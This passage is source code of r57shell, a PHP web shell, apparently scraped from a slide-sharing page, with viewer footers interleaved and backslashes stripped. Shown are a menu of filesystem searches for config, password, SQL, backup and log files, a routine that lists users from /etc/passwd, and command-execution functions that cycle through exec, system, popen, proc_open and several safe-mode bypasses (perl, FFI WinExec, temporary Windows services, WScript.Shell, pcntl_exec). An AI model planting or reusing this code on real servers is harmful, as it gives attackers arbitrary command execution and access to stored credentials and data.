'.$tempdir.'grep.txt'=>'find / -type f -name conf.php >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'find config.dat files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -name config.dat >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'find config.php files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -name config.php >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
  • 57. 'find config.inc files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -name config.inc >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'find config.inc.php files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -name config.inc.php >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'find config.default.php files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -name config.default.php >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'find *.conf files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -name "*.conf" >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'find *.pwd files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -name "*.pwd" >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'find *.sql files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -name "*.sql" >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'find *backup* files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -name "*backup*" >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'find *dump* files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -name "*dump*" >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', '-----------------------------------'=>'', 'find /var/ auth_log files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find /var/ -type f -name auth_log >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'find /var/ access_log files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find /var/ -type f -name access_log >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'find /var/ error_log files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find /var/ -type f -name error_log >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'find /var/ auth.log files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find /var/ -type f -name auth.log >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'find /var/ access.log files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find /var/ -type f -name access.log >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'find /var/ error.log files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find /var/ -type f -name error.log >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'find /var/ "*_log" files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find /var/ -type f -name "*.log" >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'find /var/ "*.log" files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find /var/ -type f -name "*.log" >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', '----------------------------------------------------------------------------------------------------'=>'ls -la' ); file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
  • 58. $table_up1 = "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b><div align=center>:: "; $table_up2 = " ::</div></b></font></td></tr><tr><td>"; $table_up3 = "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc>"; $table_end1 = "</td></tr>"; $arrow = " <font face=Webdings color=gray>4</font>"; $lb = "<font color=black>[</font>"; $rb = "<font color=black>]</font>"; $font = "<font face=Verdana size=-2>"; $ts = "<table class=table1 width=100% align=center>"; $te = "</table>"; $fs = "<form name=form method=POST>"; $fe = "</form>"; if(isset($_GET['users'])) { if(!$users=get_users('/etc/passwd')) { echo "<center><font face=Verdana size=-2 color=red>".$lang[$language.'_text96']."</font></center>"; } else { echo '<center>'; foreach($users as $user) { echo $user."<br>"; } echo '</center>'; } echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href='".$_SERVER['PHP_SELF']."'>BACK</a> ]</b></font></div>"; die(); } if (!empty($_POST['dir'])) { if(@function_exists('chdir')){@chdir($_POST['dir']);} else if(@function_exists('chroot')){ @chroot($_POST['dir']);}; } file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
  • 59. if (empty($_POST['dir'])){if(@function_exists('chdir')){$dir = @getcwd();};}else{$dir=$_POST['dir'];} $unix = 0; if(strlen($dir)>1 && $dir[1]==":") $unix=0; else $unix=1; if(empty($dir)) { $os = getenv('OS'); if(empty($os)){ $os = @php_uname(); } if(empty($os)){ $os ="-"; $unix=1; } else { if(@eregi("^win",$os)) { $unix = 0; } else { $unix = 1; } } } if(!empty($_POST['s_dir']) && !empty($_POST['s_text']) && !empty($_POST['cmd']) && $_POST['cmd'] == "search_text") { echo $head; if(!empty($_POST['s_mask']) && !empty($_POST['m'])) { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text'],$_POST['s_mask']); } else { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text']); } $sr->SearchText(0,0); $res = $sr->GetResultFiles(); $found = $sr->GetMatchesCount(); $titles = $sr->GetTitles(); $r = ""; if($found > 0) file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
  • 60. { $r .= "<TABLE width=100%>"; foreach($res as $file=>$v) { $r .= "<TR>"; $r .= "<TD colspan=2><font face=Verdana size=-2><b>".ws(3); $r .= (!$unix)? str_replace("/","",$file) : $file; $r .= "</b></font></ TD>"; $r .= "</TR>"; foreach($v as $a=>$b) { $r .= "<TR>"; $r .= "<TD align=center><B><font face=Verdana size=-2>".$a."</font></B></TD>"; $r .= "<TD><font face=Verdana size=-2>".ws(2).$b."</font></TD>"; $r .= "</TR>n"; } } $r .= "</TABLE>"; echo $r; } else { echo "<P align=center><B><font face=Verdana size=-2>".$lang[$language.'_text56']."</B></font></P>"; } echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href='".$_SERVER['PHP_SELF']."'>BACK</a> ]</b></font></div>"; die(); file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
  • 61. } /*if(!$safe_mode && strpos(ex("echo abcr57"),"r57")!=3) { $safe_mode = 1; }*/ if(strpos(ex("echo abcr57"),"r57")!=3) { $safe_mode = 1; }else{$safe_mode = 0;} $SERVER_SOFTWARE = getenv('SERVER_SOFTWARE'); if(empty($SERVER_SOFTWARE)){ $SERVER_SOFTWARE = "-"; } function ws($i) { return @str_repeat("&nbsp;",$i); } function ex($cfe) {global $unix,$tempdir; $res = ''; if (!empty($cfe)) { if(@function_exists('exec')) { @exec($cfe,$res); $res = join("n",$res); } elseif(@function_exists('shell_exec')) { $res = @shell_exec($cfe); } elseif(@function_exists('system')) file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
  • 62. { @ob_start(); @system('$cfe'); $res = @ob_get_contents(); @ob_end_clean(); } elseif(@function_exists('passthru')) { @ob_start(); @passthru($cfe); $res = @ob_get_contents(); @ob_end_clean(); } elseif(@function_exists('popen') && @is_resource($f = @popen($cfe,"r"))) { $res = ""; if(@function_exists('fread') && @function_exists('feof')){ while(!@feof($f)) { $res .= @fread($f,1024); } }else if(@function_exists('fgets') && @function_exists('feof')){ while(!@feof($f)) { $res .= @fgets($f,1024); } } @pclose($f); } elseif(@function_exists('proc_open') && @is_resource($f = @proc_open($cfe,array(1 => array("pipe", "w")),$pipes))) { $res = ""; if(@function_exists('fread') && @function_exists('feof')){ file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
  • 63. while(!@feof($pipes[1])) {$res .= @fread($pipes[1], 1024);} }else if(@function_exists('fgets') && @function_exists('feof')){ while(!@feof($pipes[1])) {$res .= @fgets($pipes[1], 1024);} } @proc_close($f); } }else{$res = safe_ex($cfe);} return htmlspecialchars($res); } function safe_ex($cfe) {global $unix,$tempdir; $res = ''; if (!empty($cfe)) { if(extension_loaded('perl')){ @ob_start(); $safeperl=new perl(); $safeperl->eval("system('$cfe')"); $res = @ob_get_contents(); @ob_end_clean(); } elseif(!$unix && extension_loaded('ffi')) { $output=$tempdir.uniqid('NJ'); $api=new ffi("[lib='kernel32.dll'] int WinExec(char *APP,int SW);"); file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
  • 64. if(!@function_exists('escapeshellarg')){$res=$api->WinExec("cmd.exe /c $cfe >"$output"",0);} else{$res=$api->WinExec("cmd.exe /c ".@escapeshellarg($cfe)." >"$output"",0);} while(!@file_exists($output))sleep(1); $res=moreread($output); @unlink($output); } elseif(!$unix && extension_loaded('win32service')) { $output=$tempdir.uniqid('NJ'); $n_ser=uniqid('NJ'); if(!@function_exists('escapeshellarg')) {@win32_create_service(array('service'=>$n_ser,'display'=>$n_ser,'path'=>'c:windowssystem32cmd.exe','params'= >"/c $cfe >"$output""));} else{@win32_create_service(array('service'=>$n_ser,'display'=>$n_ser,'path'=>'c:windowssystem32cmd.exe','para ms'=>"/c ".@escapeshellarg($cfe)." >"$output""));} @win32_start_service($n_ser); @win32_stop_service($n_ser); @win32_delete_service($n_ser); while(!@file_exists($output))sleep(1); $res=moreread($output); @unlink($output); } elseif(!$unix && extension_loaded("win32std")) { $output=$tempdir.uniqid('NJ'); if(!@function_exists('escapeshellarg')){@win_shell_execute('..............windowssystem32cmd.exe /c '.$cfe.' > "'.$output.'"');} file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
  • 65. else{@win_shell_execute('..............windowssystem32cmd.exe /c '.@escapeshellarg($cfe).' > "'.$output.'"');} while(!@file_exists($output))sleep(1); $res=moreread($output); @unlink($output); } elseif(!$unix) { $output=$tempdir.uniqid('NJ'); $suntzu = new COM("WScript.Shell"); if(!@function_exists('escapeshellarg')){$suntzu->Run('c:windowssystem32cmd.exe /c '.$cfe.' > "'.$output.'"');} else{$suntzu->Run('c:windowssystem32cmd.exe /c '.@escapeshellarg($cfe).' > "'.$output.'"');} $res=moreread($output); @unlink($output); } elseif(@function_exists('pcntl_exec') && @function_exists('pcntl_fork')) { $res = '[~] Blind Command Execution via [pcntl_exec]nn'; $output=$tempdir.uniqid('pcntl'); $pid = @pcntl_fork(); if ($pid == -1) { $res .= '[-] Could not children fork. Exit'; } else if ($pid) { if (@pcntl_wifexited($status)){$res .= '[+] Done! Command "'.$cfe.'" successfully executed.';} else {$res .= '[-] Error. Command incorrect.';} } else { $cfe = array(" -e 'system("$cfe > $output")'"); if(@pcntl_exec('/usr/bin/perl',$cfe)) exit(0); file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
  • 66. if(@pcntl_exec('/usr/local/bin/perl',$cfe)) exit(0); die(); } $res=moreread($output); @unlink($output); } /* elseif(1) { } */ } return htmlspecialchars($res); } function get_users($filename) { $users = $rows = array(); $rows=@explode("n",moreread($filename)); if(!$rows[0]){$rows=@explode("n",readzlib($filename));} if(!$rows[0]) return 0; foreach ($rows as $string) { $user = @explode(":",trim($string)); if(substr($string,0,1)!='#') array_push($users,$user[0]); } return $users; file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
  • 67. } function err($n,$txt='') { echo '<table width=100% cellpadding=0 cellspacing=0><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>'; echo $GLOBALS['lang'][$GLOBALS['language'].'_err'.$n]; if(!empty($txt)) { echo " $txt"; } echo '</b></div></font></td></tr></table>'; return null; } function perms($mode) { if (!$GLOBALS['unix']) return 0; if( $mode & 0x1000 ) { $type='p'; } else if( $mode & 0x2000 ) { $type='c'; } else if( $mode & 0x4000 ) { $type='d'; } else if( $mode & 0x6000 ) { $type='b'; } else if( $mode & 0x8000 ) { $type='-'; } else if( $mode & 0xA000 ) { $type='l'; } else if( $mode & 0xC000 ) { $type='s'; } else $type='u'; $owner["read"] = ($mode & 00400) ? 'r' : '-'; $owner["write"] = ($mode & 00200) ? 'w' : '-'; $owner["execute"] = ($mode & 00100) ? 'x' : '-'; $group["read"] = ($mode & 00040) ? 'r' : '-'; $group["write"] = ($mode & 00020) ? 'w' : '-'; $group["execute"] = ($mode & 00010) ? 'x' : '-'; $world["read"] = ($mode & 00004) ? 'r' : '-'; file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
  • 68. $world["write"] = ($mode & 00002) ? 'w' : '-'; $world["execute"] = ($mode & 00001) ? 'x' : '-'; if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S'; if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S'; if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T'; $s=sprintf("%1s", $type); $s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']); $s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']); $s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']); return trim($s); } function in($type,$name,$size,$value,$checked=0) { $ret = "<input type=".$type." name=".$name." "; if($size != 0) { $ret .= "size=".$size." "; } $ret .= "value="".$value."""; if($checked) $ret .= " checked"; return $ret.">"; } function which($pr) { $path = ''; $path = ex("which $pr"); if(!empty($path)) { return $path; } else { return false; } } function ps($pr) {global $unix; file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
  • 69. $path = ''; if($unix){$path = ex("ps -aux | grep $pr | grep -v 'grep'");} else{$path = ex("tasklist | findstr "$pr"");} if(!empty($path)) { return $path; } else { return false; } } function locate($pr) { $path = ''; $path = ex("locate $pr"); if(!empty($path)) { return $path; } else { return false; } } function cf($fname,$text) { if(!morewrite($fname,@base64_decode($text))){err(0);}; } function sr($l,$t1,$t2) { return "<tr class=tr1><td class=td1 width=".$l."% align=right>".$t1."</td><td class=td1 align=left>".$t2."</td></tr>"; } if (!@function_exists("view_size")) { function view_size($size) { if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";} elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";} elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";} else {$size = $size . " B";} file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
  • 70. return $size; } } function DirFilesR($dir,$types='') { $files = Array(); if(($handle = @opendir($dir))) { while (false !== ($file = @readdir($handle))) { if ($file != "." && $file != "..") { if(@is_dir($dir."/".$file)) $files = @array_merge($files,DirFilesR($dir."/".$file,$types)); else { $pos = @strrpos($file,"."); $ext = @substr($file,$pos,@strlen($file)-$pos); if($types) { if(@in_array($ext,explode(';',$types))) $files[] = $dir."/".$file; } else $files[] = $dir."/".$file; } } file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
  • 71. } @closedir($handle); } return $files; } class SearchResult { var $text; var $FilesToSearch; var $ResultFiles; var $FilesTotal; var $MatchesCount; var $FileMatschesCount; var $TimeStart; var $TimeTotal; var $titles; function SearchResult($dir,$text,$filter='') { $dirs = @explode(";",$dir); $this->FilesToSearch = Array(); for($a=0;$a<count($dirs);$a++) $this->FilesToSearch = @array_merge($this->FilesToSearch,DirFilesR($dirs[$a],$filter)); $this->text = $text; $this->FilesTotal = @count($this->FilesToSearch); $this->TimeStart = getmicrotime(); $this->MatchesCount = 0; $this->ResultFiles = Array(); file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]